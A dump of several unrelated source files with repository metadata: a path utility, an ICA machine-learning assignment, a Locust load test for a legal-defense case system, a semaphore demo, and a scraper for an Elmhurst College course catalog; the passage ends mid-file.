UTF-8
|
Python
| false
| false
| 504
|
py
|
import itertools
import os
def chunked(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
def expand_path(path):
"""
Convert relative paths to absolute paths expanding environment variables, and '~' to
represent the user $HOME directory in filenames.
:param path: path to be expanded.
"""
return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))
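# Minimal usage sketch (illustrative only; the '~/mail/$USER' path below is an
# assumption, not part of gmailsync):
# >>> list(chunked(range(5), 2))
# [(0, 1), (2, 3), (4,)]
# >>> expand_path('~/mail/$USER')  # '~' and $USER expanded to an absolute path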
|
[
"albertoalcolea@gmail.com"
] |
albertoalcolea@gmail.com
|
a99dbfd23d95657ed987f929ac6e3d4f7fd948f8
|
a64f122dd4df3e20bc3e25aca31bb11ec9d55977
|
/Assignment 3/ICA.py
|
507e0eba4db4d38a810c8e4fc5190d3e25708cc8
|
[] |
no_license
|
mbrine555/gatech_ML
|
f9de5e1e1c29e40693030fcf3dce4797339f3ada
|
2a3dea874ac7710104fb891a5199afa9f3c046af
|
refs/heads/master
| 2020-04-16T10:39:44.328425
| 2019-04-10T11:54:37
| 2019-04-10T11:54:37
| 165,512,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#%% Imports
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from helpers import nn_arch, nn_reg
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import FastICA
out = './ICA/'
np.random.seed(0)
digits = pd.read_hdf('./BASE/datasets.hdf','digits')
digitsX = digits.drop('Class',1).copy().values
digitsY = digits['Class'].copy().values
madelon = pd.read_hdf('./BASE/datasets.hdf','madelon')
madelonX = madelon.drop('Class',1).copy().values
madelonY = madelon['Class'].copy().values
madelonX = StandardScaler().fit_transform(madelonX)
digitsX= StandardScaler().fit_transform(digitsX)
clusters = [2,5,10,15,20,25,30,35,40]
dims = [2,3,4,5,6,7,8,9,10,11]
#raise
#%% data for 1
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(madelonX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'madelon scree.csv')
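# The mean absolute kurtosis per dimensionality acts as a scree-style criterion
# for ICA: more strongly non-Gaussian (kurtotic) components suggest a better
# independent-component fit. The same sweep is repeated for the digits data below.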
dims = [2,5,10,15,20,25,30,35,40,45,50,55,60]
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(digitsX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'digits scree.csv')
raise
#%% Data for 2
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(madelonX,madelonY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'Madelon dim red.csv')
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(digitsX,digitsY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'digits dim red.csv')
raise
#%% data for 3
# Set this from chart 2 and dump, use clustering script to finish up
dim = 45
ica = FastICA(n_components=dim,random_state=10)
madelonX2 = ica.fit_transform(madelonX)
madelon2 = pd.DataFrame(np.hstack((madelonX2,np.atleast_2d(madelonY).T)))
cols = list(range(madelon2.shape[1]))
cols[-1] = 'Class'
madelon2.columns = cols
madelon2.to_hdf(out+'datasets.hdf','madelon',complib='blosc',complevel=9)
dim = 60
ica = FastICA(n_components=dim,random_state=10)
digitsX2 = ica.fit_transform(digitsX)
digits2 = pd.DataFrame(np.hstack((digitsX2,np.atleast_2d(digitsY).T)))
cols = list(range(digits2.shape[1]))
cols[-1] = 'Class'
digits2.columns = cols
digits2.to_hdf(out+'datasets.hdf','digits',complib='blosc',complevel=9)
|
[
"briner.15@osu.edu"
] |
briner.15@osu.edu
|
74d2f041b4f2ac6cdb869ee1926db295164b1264
|
4b6fc63aecf127806b34998cdaef0f7342514dcd
|
/Stress/SIGI_Fase_1/Defensor.py
|
0d84b621c51b08e4bfe546158149c1af5667da44
|
[
"CC0-1.0"
] |
permissive
|
VictorAdad/sigi-api-adad
|
08365166f0443cc5f2c90fa792a63998e185f3f1
|
412511b04b420a82cf6ae5338e401b181faae022
|
refs/heads/master
| 2021-04-29T14:27:21.807529
| 2018-02-16T17:42:04
| 2018-02-16T17:42:04
| 121,772,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,978
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from locust import HttpLocust, TaskSet, task
from requests_toolbelt import MultipartEncoder
from random import randrange
import requests
import mysql.connector
from mysql.connector import errorcode
import variables
import time
url = variables.url # change the URL format if necessary (append '/' or an empty string)
documentos = variables.documentos
def login(self):
time.sleep(3)
self.client.post(url+"login", {"nombreUsuario":"ana.martinez", "password":"secret"})
print "DEFENSOR LOGIN"
def index(self):
self.client.get(url)
self.wait()
def verMisDefensas(self):
index(self)
time.sleep(3)
print("Ver mis Defensas")
self.client.get(url+"defensa/abogado")
self.wait()
def verDetalleDefensa(self):
idDefensa = findDefensa()
print("Ver Detalle de la defensa: "+str(idDefensa))
if idDefensa!=0:
self.client.get(url+"defensa/"+idDefensa)
self.wait()
def crearEtapasProcesales(self, idDefensa):
print("Crear la etapas procesales")
#audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+idDefensa)
#otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E")
#acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
options = randrange(1,4)
print("ETAPA NUMERO: "+str(options))
# Dispatch only the selected stage; calling the functions inside a dict literal
# would execute all three, so wrap them in lambdas and invoke the chosen one.
etapas = {
1 : lambda: audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+str(idDefensa)),
2 : lambda: otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E"),
3 : lambda: acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
}
etapas[options]()
self.wait()
def audienciaInicial(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,6)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fecha":"18/07/2016",
"hora":"16:00",
"tipoAudiencia":"Inicial",
"antecedente":"false",
"action":"Crear",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'rb'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"controlDetencion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def otrasAudiencias(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"clasificacion": "E",
"tipoAudiencia": "Intermedia",
"organoJurisdiccional.id":"10027",
"fechaAudiencia":"29/07/2016",
"horaAudiencia":"10:00",
"fundamentoLegal":"Fundamento legal de la audiencia",
"comentarios":"La Audiencia de ... se llevará a cabo con el fin de ...",
"causaMotivo":"",
"sintesisAudiencia":"Síntesis de la Audiencia ...",
"antecedente":"false",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"audiencia/"+idDefensa+"/0", data = m, headers={'Content-Type': m.content_type})
self.wait()
def acusacion(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fechaPresentacion":"20/07/2016",
"delitos":"111,149",
"clasificacionLegal":"Clasificación Legal de la Acusación",
"coadyuvanciaAcusacion":"false",
"delitosCoadyuvancia":"",
"fechaAudienciaIntermedia":"25/07/2016",
"horaAudienciaIntermedia":"17:00",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"acusacion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def GuardarSituacionJuridicaDefensa(self):
idDefensa = findDefensa()
print("Guardar Situació Jurídica de Defensa para Mayores de Edad: "+str(idDefensa))
if idDefensa != 0:
self.client.post(url+"defensa/"+idDefensa, data = {
"edadDelito": "25",
"fechaInicioTermino":"16/07/2016",
"horaInicioTermino": "15:00",
"delitos":"311,48",
"observaciones":"El peticionario se encuentra en una situación ... Para lo cual se recomienda ...",
"defensorAsistio":"",
"defensoresAutorizados":""
})
self.wait()
crearEtapasProcesales(self, idDefensa)
def findDefensa():
defensaId = 0
try:
conn = mysql.connector.connect(user = variables.DB_USER, password=variables.DB_PASS, database = variables.DB_NAME, host =variables.DB_HOST)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exists")
else:
print(err)
else:
cursor = conn.cursor()
query = ("SELECT id FROM defensa WHERE usuario_id = 27 AND edad_delito is null")
print(query)
cursor.execute(query)
print(cursor)
available = []
for id in cursor:
print("VALUE %s" % str(id[0]) )
available.append(str(id[0]))
print(available)
print(len(available))
if len(available) != 0:
maxNumber = len(available)-1
if maxNumber == 0:
defensaId = available[maxNumber]
else:
defensaId = available[randrange(maxNumber)]
else:
defensaId = 0
print("No hay Defensas disponibles pendientes...")
cursor.close()
conn.close()
return defensaId
class UserTasks(TaskSet):
tasks = {
index:2,
verMisDefensas:2,
verDetalleDefensa:2,
GuardarSituacionJuridicaDefensa:2
}
def on_start(self):
login(self)
|
[
"evomatik@localhost.localdomain"
] |
evomatik@localhost.localdomain
|
839113b7423bd08946db266c62e3e63a9519e089
|
cbc5e5e32cdb04a16b3d2306f7d8dc265a86c47b
|
/py9/Test_Semaphore.py
|
0d640709f22e835dd46ded3338e1a7783df24eac
|
[] |
no_license
|
github-ygy/python_leisure
|
9821bd9feb6b5f05e98fd09ed1be1be56f3f8e35
|
f58ee2668771b1e334ef0a0b3e3fc7f6aacb8ccf
|
refs/heads/master
| 2021-01-23T06:15:27.715836
| 2017-10-31T16:56:44
| 2017-10-31T16:56:44
| 102,496,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
#!/usr/bin/env python
# author:ygy
import threading, time
def run(n):
semaphore.acquire() # acquire the semaphore (blocks while the count is exhausted)
print("run the thread: %s" % n)
time.sleep(1)
print("off the thread:%s" % n)
semaphore.release() # release the semaphore slot
# if __name__ == '__main__':
semaphore = threading.BoundedSemaphore(5) # allow at most 5 threads to run at the same time
for i in range(22):
t = threading.Thread(target=run, args=(i,))
t.start()
|
[
"ygyworkforit@163.com"
] |
ygyworkforit@163.com
|
5fb5b8bd13952aead969b606c55f76af216ae318
|
29b2475e4647756078eb2772c0d6b570ace0d933
|
/elmhurst_college.py
|
b13050c2d896a6e9d557274798e999436820fcb5
|
[] |
no_license
|
RDulepet19/Liberal-Arts-Index
|
a0f560b15d61940c63c8f4514d7a2a024bdfac8e
|
bc59811a8c0f0c27f56ebff25102977fea804260
|
refs/heads/master
| 2020-03-24T02:44:11.192802
| 2019-03-20T08:25:34
| 2019-03-20T08:25:34
| 142,388,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,707
|
py
|
# coding: utf-8
# MIT License
#
# Copyright (c) 2018 Riya Dulepet <riyadulepet123@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Thanks to the entire Columbia INCITE team for suggestions/recommendations, collaboration, critic, advice, and mentoring. This code was generated as part of internship @INCITE Columbia for Lit Index project.
# # Scraper for Elmhurst College Course Description
# ## Setup environment
# * Make sure Java is installed
# * Download [Apache Tika](http://apache.mirrors.ionfish.org/tika/tika-app-1.19.1.jar)
# ## Download Elmhurst College Course Descriptions
# * [Download Elmhurst College Course Description PDF](https://www.elmhurst.edu/wp-content/uploads/2018/06/Elmhurst-College-Catalog-2018-2019.pdf)
#
#
# ## Extract Plain Text file from PDF using Apache TIKA
# * java -jar tika-app-1.19.1.jar -t Elmhurst-College-Catalog-2018-2019.pdf > Elmhurst-College-Catalog-2018-2019.txt
#
# ### Extract manually exact name and unit ID
# [IPED website](https://nces.ed.gov/collegenavigator/?q=elmhurst&s=all&id=144962)
# * `UnitID` 144962
# * `Name` Elmhurst College
# In[9]:
INSTITUTION_ID = '144962'
INSTITUTION_NAME = 'Elmhurst College'
CATALOG_YEAR = '2018' # It's the 2018-2019 academic year catalog
CATALOG_URL = 'https://www.elmhurst.edu/wp-content/uploads/2018/06/Elmhurst-College-Catalog-2018-2019.pdf'
# ### Rules of extraction (for each department)
# * Sequence is important
# * Line starting with **COURSES** - Indicates start of course descriptions
# * Line starting with **FACULTY** - Indicates end of course descriptions
# * Department name is a line containing only the case-sensitive department title and code, for example ACCOUNTING (ACC) or ART HISTORY (ART)
#
# ### Rules of Extraction (for each course)
# * Sequence is important
# * A line ending with **Semester Hour(s)** should be treated as the start of a new course
# * Ignore all empty lines
# * Example line in the format "WLE 101 Introduction to Outdoor Education 4 Semester Hours" is the start of a new course
# * It should be broken into `Course Code` (alphanumeric), `Course Title` (string, possibly multiple words) and `Credit Hours` (floating point number with decimal)
# * The next non-empty line should be treated as `Course Description` (a paragraph or multiple lines of text, which should be combined into one line)
# * The `Course Description` can optionally be used to parse out `Offerings`, `Prerequisites`, `Lessons`, `Labs`, and `Notes`
#
#
# ## Solution Architecture
# #### To extract desired Course Descriptions, we define primarily two classes:
# * `Department`
# * `Course`
# #### In addition:
# * `Department` is a container for number of `Course`(s)
# * `Departments` is a `list/collection` of `Department`
# #### Processing Methodology implements the Rules described earlier for parsing each `Department` and each `Course' within it
# In[10]:
import numpy as np
import re
# constants
# added manually following departments to map courses
MAP_DEPARTMENTS = {"ART":"Art", "BID":"Bidisciplinary", "BIO":"Biology", "MTH":"Math", "BUS":"Business", "ECO":"Economics", "CHM":"Chemistry", "COM":"Communication", "THE":"Theatre", "CSD":"Communication Sciences and Disorders", "CS":"Computer Science and Information Systems", "CGE":"Computer Game and Entertainment Technology", "IS":"Information Systems", "EDU":"Education", "ELM":"Elementary Education", "EYC":"Educating Young Children", "SEC":"Secondary Education", "SPE":"Special Education", "TEL":"Teaching English Learners", "ENG":"English", "GEO":"Geography", "POL":"Political Science", "HIS":"History", "HON":"Honors", "ICS":"Intercultural Studies", "SOC":"Sociology", "KIN":"Kinesiology", "MEH":"Medical Humanities", "AME":"Music", "MUS":"Music", "AMA":"Applied Music", "AMB":"Applied Music", "AMN":"Applied Music", "AMC":"Applied Music", "AMD":"Applied Music", "AMG":"Applied Music", "AMH":"Applied Music", "AMJ":"Applied Music", "AMO":"Applied Music", "AMP":"Applied Music", "AMS":"Applied Music", "AMT":"Applied Music", "AMV":"Applied Music", "AMW":"Applied Music", "NRS":"Nursing", "PHL":"Philosophy", "AST":"Astronomy", "PHY":"Physics", "PSY":"Psychology", "REL":"Religious Study", "CJ":"Criminal Justice", "URB":"Urban Studies", "ARB":"Arabic", "CHN":"Chinese", "FRN":"French", "GRM":"German", "JPN":"Japanese", "SPN":"Spanish", "WL":"World Languages", "CPP":"Professional Portfolio", "GIS":"Geographic Information Systems", "ISG":"Information Systems", "IT":"Information Technology", "SCM":"Supply Chain Management", "MBA":"Master of Business Administration", "MIT":"Masters in Information Technology", "MDS":"Masters in Data Science", "MEC":"Early Childhood Education", "MTL":"Masters in Teacher Leadership", "AGS":"Geographic Information Systems", "MPH":"Public Health", "MOT":"Occupational Therapy", "HCA":"Health Care", "MPM":"Project Management", "APH":"Human Geography", "MAT":"Master of Arts in Teaching"}
REGEX_START_DEPARTMENTS = r'^\s*COURSE DESCRIPTIONS\s*$'
PATTERN_REGEX_START_DEPARTMENTS = re.compile(REGEX_START_DEPARTMENTS)
REGEX_END_DEPARTMENTS = r'^BOARD OF TRUSTEES\s*$'
PATTERN_REGEX_END_DEPARTMENTS = re.compile(REGEX_END_DEPARTMENTS)
REGEX_DEPARTMENT_NAME = r'^([A-Z ]+)\s*\([A-Z]+\)\s*$'
PATTERN_REGEX_DEPARTMENT_NAME = re.compile(REGEX_DEPARTMENT_NAME)
REGEX_NEW_COURSE = r"^([A-Z]+)\s+([0-9]+)\s+([A-Z][\w\s\/–\-:'’,“®&]+)"
PATTERN_REGEX_NEW_COURSE = re.compile(REGEX_NEW_COURSE) #, re.IGNORECASE)
REGEX_IGNORE_NEW_COURSE = r'[\[\]]'
PATTERN_REGEX_IGNORE_NEW_COURSE = re.compile(REGEX_IGNORE_NEW_COURSE) #, re.IGNORECASE)
REGEX_DOCUMENT_HEADER = r'^\s*[0-9]+\s*$'
PATTERN_REGEX_DOCUMENT_HEADER = re.compile(REGEX_DOCUMENT_HEADER)
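# Illustrative check of the new-course pattern against the sample header quoted in
# the extraction rules above (groups 1-2 are the course code and number):
# >>> PATTERN_REGEX_NEW_COURSE.match("WLE 101 Introduction to Outdoor Education 4 Semester Hours").groups()[:2]
# ('WLE', '101')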
# In[20]:
import json
class Course:
'Common base class for all courses'
REGEX_OFFERINGS = r'Offered\s*(.*?)\.'
PATTERN_REGEX_OFFERINGS = re.compile(REGEX_OFFERINGS, re.IGNORECASE)
REGEX_NOT_OFFERINGS = r'Not Offered\s*(.*?)\.'
PATTERN_REGEX_NOT_OFFERINGS = re.compile(REGEX_NOT_OFFERINGS, re.IGNORECASE)
REGEX_PARTIAL_COURSE_NAME = r'^.*?\)\s+[A-Z]'
PATTERN_REGEX_PARTIAL_COURSE_NAME = re.compile(REGEX_PARTIAL_COURSE_NAME, re.IGNORECASE)
REGEX_PREREQUISITE = r'Prerequisite[s]*:\s*(.*?)\.'
PATTERN_REGEX_PREREQUISITE = re.compile(REGEX_PREREQUISITE, re.IGNORECASE)
REGEX_COREQUISITE = r'Co\-*requisite[s]*:\s*(.*?)\.'
PATTERN_REGEX_COREQUISITE = re.compile(REGEX_COREQUISITE, re.IGNORECASE)
REGEX_NOTES = r'Note[s]*:\s*(.*?)\.'
PATTERN_REGEX_NOTES = re.compile(REGEX_NOTES, re.IGNORECASE)
# make class JSON serializable
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def __repr__(self):
from pprint import pformat
return pformat(vars(self), indent=4, width=1)
    def __init__(self, code=None, name=None, course_num=None, credit_hours=None):
        # initialize class; default to the catalog's standard .75-credit course unit
        # unless a credit figure is passed in or parsed later from the description
        self.code = code
        self.name = name
        self.credit_hours = credit_hours if credit_hours is not None else "0.75"
        self.course_num = course_num
# other member variables
self.offerings = ""
self.description = ""
self.prerequisites = ""
self.corequisites = ""
self.notes = ""
self.requirements = ""
def set_code(self, code):
self.code = code
def set_name(self, name):
self.name = name
def set_course_num(self, course_num):
self.course_num = course_num
def set_credit_hours(self, credit_hours):
self.credit_hours = credit_hours
def set_offering(self, offerings):
self.offerings = offerings
def check_and_update_offerings_description_lines(self, line):
# check if credit stuff mixed as first line in course description
credit_hours_regex = r"^([\d]*\.*[\d]*\s*[,tor\-–\s]*[\dtor,\-–\.\s]*)\s*[course]*\s*credits*"
credit_hours = re.findall(credit_hours_regex, line.strip())
if line.strip() in ['.50 credit, or 14 to 17 hours weekly for 1.00 credit.', '.25 credit or noncredit', '.50 credit; part-time', 'Non-credit; optional', '.25, .50 or .75 credit as needed to earn 8.50 credits', 'Noncredit', '(.50 credit)']:
self.credit_hours = line.strip()
elif len(credit_hours) > 0:
self.credit_hours = credit_hours[0]
else:
# handle case of incomplete course name that is mixed up as
# first line in course description assuming prior course name
# ends with space indicating partial name
if self.name.endswith(' '):
self.name += line
self.name = self.name.strip()
else:
self.description += " "
self.description += line
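# Illustrative (hypothetical) use of Course: a credit line updates credit_hours, while any other
# line is appended to the running description; the sample values are made up for demonstration only.
_demo_course = Course(code="BIO 200", name="Introduction to Cell Biology", course_num="200")
_demo_course.check_and_update_offerings_description_lines(".50 credit")  # captured as the credit figure
_demo_course.check_and_update_offerings_description_lines("Survey of cell structure and function.")  # appended to description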
# In[21]:
import json
class Department:
'Common base class for all departments'
def __repr__(self):
from pprint import pformat
return pformat(vars(self), indent=4, width=1)
def __init__(self, institution_id = None, institution_name = None, catalog_year = None, url = None, name = None, num_of_courses = None):
# initialize class
self.institution_id = institution_id
self.institution_name = institution_name
self.catalog_year = catalog_year
self.url = url
self.department_name = name
self.courses = []
# make class JSON serializable
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def set_department_name(self, department_name):
self.department_name = MAP_DEPARTMENTS[department_name]
# print("\tMAP_DEPARTMENTS=", self.department_name)
def add_course(self, course):
self.courses.append(course)
def display_institution_id(self):
print ("Institution ID: %s" % self.institution_id)
def display_institution_name(self):
print ("Institution Name: %s" % self.institution_name)
def display_department_name(self):
print ("Department Name: %s" % self.department_name)
def display_number_of_courses(self):
print ("Number of Courses: %d" % len(self.courses))
# In[36]:
import pandas as pd
def dump_output(departments, file_to_save):
df_college = pd.DataFrame(columns=['ipeds_id', 'ipeds_name', 'catalog_year', 'url', 'subject', 'subject_code', 'course_number', 'description', 'course_name', 'credits', 'prereqs', 'corequisites_raw', 'offerings_raw', 'notes_raw', 'requirements_raw'])
    for key, department in departments.items():
for course in department.courses:
# handle only records with course description, otherwise ignore
course.description = course.description.strip()
if course.description and not course.description.endswith('courses chosen from:'):
# make sure course name doesn't contain multiple subject codes
course.name = course.name.split("(")[0].strip()
set_potential_course_codes = set(re.findall(r'\b([A-Z][A-Z\s]*[A-Z]|[A-Z])\b', course.name))
all_subject_codes = set(['ART', 'BID', 'BIO', 'MTH', 'BUS', 'ECO','CHM', 'COM', 'THE','CSD','CS','CGE','IS', 'EDU','ELM', 'EYC','SEC', 'SPE','TEL', 'ENG','GEO', 'POL', 'HIS', 'HON', 'ICS','SOC', 'KIN','MEH', 'AME','MUS', 'AMA', 'AMB', 'AMN','AMC', 'AMD','AMG', 'AMH','AMJ', 'AMO','AMP', 'AMS', 'AMT', 'AMV','AMW', 'NRS','PHL', 'AST','PHY', 'PSY', 'REL', 'CJ','URB', 'ARB','CHN', 'FRN', 'GRM','JPN', 'SPN','WL', 'CPP','GIS', 'ISG','IT', 'SCM','MBA','MIT', 'MDS', 'MEC','MTL', 'AGS','MPH', 'MOT','HCA', 'MPM', 'APH', 'MAT'])
if len(set_potential_course_codes & all_subject_codes) > 0:
# skip to next course since it is invalid course
continue
# skip courses that have course description less than 65 characters or
# if the course starts with [ or (, then ignore that course
# if (not re.search('^[\[\(]', course.description)) and (len(course.description) > 65):
                # also ignore any content in parentheses in course.name
df_college.loc[len(df_college)] = [department.institution_id, department.institution_name, department.catalog_year, department.url, department.department_name.strip(), course.code, course.course_num, course.description.strip(), course.name, course.credit_hours, course.prerequisites.strip(), course.corequisites.strip(), course.offerings.strip(), course.notes.strip(), course.requirements.strip()]
df_college.to_csv(file_to_save, index=False)
# In[37]:
import re, random
Departments = {}
all_departments_found = []
def main():
global INSTITUTION_ID, INSTITUTION_NAME, CATALOG_YEAR, CATALOG_URL
global Departments
found_new_course = False
# keep track of last two lines (to avoid false positives when identifying new course)
prev_prev_line = ""
prev_line = ""
current_course = None
fname = "Elmhurst-College-Catalog-2018-2019.txt"
#fname = "temp.txt"
with open(fname) as fp:
lines = fp.read().splitlines()
for i, line in enumerate(lines):
line = line.replace(u'\xa0', u' ')#.strip()
if 0 == len(line):
# empty line or maybe end of current course
found_new_course = False
continue
else:
# look for new course
new_course = PATTERN_REGEX_NEW_COURSE.findall(line)
if len(new_course) > 0:
if PATTERN_REGEX_IGNORE_NEW_COURSE.search(line):
# ignore false positive
continue
# print(new_course)
                    # initialize fields for the new course; create a new department first if it doesn't exist yet
new_department = new_course[0][0].split()[0].strip()
# print("new_course=", new_course, "new_department=", new_department)
if new_department not in all_departments_found:
department = Department(INSTITUTION_ID, INSTITUTION_NAME, CATALOG_YEAR, CATALOG_URL)
try:
department.set_department_name(new_department)
except:
print("An unexpected error occurred, line=%s" % (line))
raise
Departments[new_department] = department
all_departments_found.append(new_department)
# create new course
course = Course()
course.set_code(new_course[0][0])
course.set_name(new_course[0][2])
course.set_course_num(new_course[0][1])
current_course = course
found_new_course = True
Departments[new_department].courses.append(course)
else:
# irrelevant line or update fields within the current course
if current_course and found_new_course:
                        # non-empty line; assume everything on it belongs to the course description
current_course.check_and_update_offerings_description_lines(line)
    # now iterate through all courses across all departments and normalize each course
    # description by extracting Prerequisites, Notes, Offerings, Recommendations, and Lecture/Labs
for key, department in Departments.items():
for course in department.courses:
offerings_regex1 = r"\.\s+([AFSWQ]\w+\s+and\s+[A-Z]\w+)\."
offerings_regex2 = r"\.*\s+([AFSWQ]\w+)\."
offerings_regex3 = r"\.\s+([AFSWQ]\w+\s+\w+)\."
offerings_regex4 = r"\.\s+([AFSWQ]\w+\s+and\/or\s+[A-Z]\w+)\."
offerings_regex5 = r"\.\s+([AFSWQ]\w+\s+or\s+[A-Z]\w+)\."
offerings_regex6 = r"Scheduled for (.*?)\."
requirements_regex = r"\[(.*?)\]"
offerings_list1 = re.findall(offerings_regex1, course.description)
offerings_list2 = re.findall(offerings_regex2, course.description)
offerings_list3 = re.findall(offerings_regex3, course.description)
offerings_list4 = re.findall(offerings_regex4, course.description)
offerings_list5 = re.findall(offerings_regex5, course.description)
offerings_list6 = re.findall(offerings_regex6, course.description)
offerings_list1 = [x for x in offerings_list1 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list2 = [x for x in offerings_list2 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list3 = [x for x in offerings_list3 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list4 = [x for x in offerings_list4 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list5 = [x for x in offerings_list5 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list6 = [x for x in offerings_list6 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list = offerings_list1 + offerings_list2 + offerings_list3 + offerings_list4 + offerings_list5 + offerings_list6
course.offerings = ', '.join(offerings_list)
meet_requirements = re.findall(requirements_regex, course.description)
if len(meet_requirements) > 0:
course.requirements = meet_requirements[0]
if not course.offerings.strip():
val = course.PATTERN_REGEX_OFFERINGS.findall(course.description)
if len(val) > 0:
course.offerings = val[0]
val = course.PATTERN_REGEX_NOT_OFFERINGS.findall(course.description)
if len(val) > 0:
course.offerings = "Not offered " + val[0]
val = course.PATTERN_REGEX_PREREQUISITE.findall(course.description)
if len(val) > 0:
course.prerequisites = val[0]
val = course.PATTERN_REGEX_COREQUISITE.findall(course.description)
if len(val) > 0:
course.corequisites = val[0]
val = course.PATTERN_REGEX_NOTES.findall(course.description)
if len(val) > 0:
course.notes = val[0]
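# Illustrative (hypothetical) example of the post-processing above: on a made-up description,
# the Offered/Prerequisite patterns pull out the offerings and prerequisites fields.
_demo_description = "Offered fall term and spring term of alternate years. Prerequisite: MTH 121."
assert Course.PATTERN_REGEX_OFFERINGS.findall(_demo_description) == ["fall term and spring term of alternate years"]
assert Course.PATTERN_REGEX_PREREQUISITE.findall(_demo_description) == ["MTH 121"]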
# In[38]:
# sampling test
def run_sample_test(random_department_index, random_course_index):
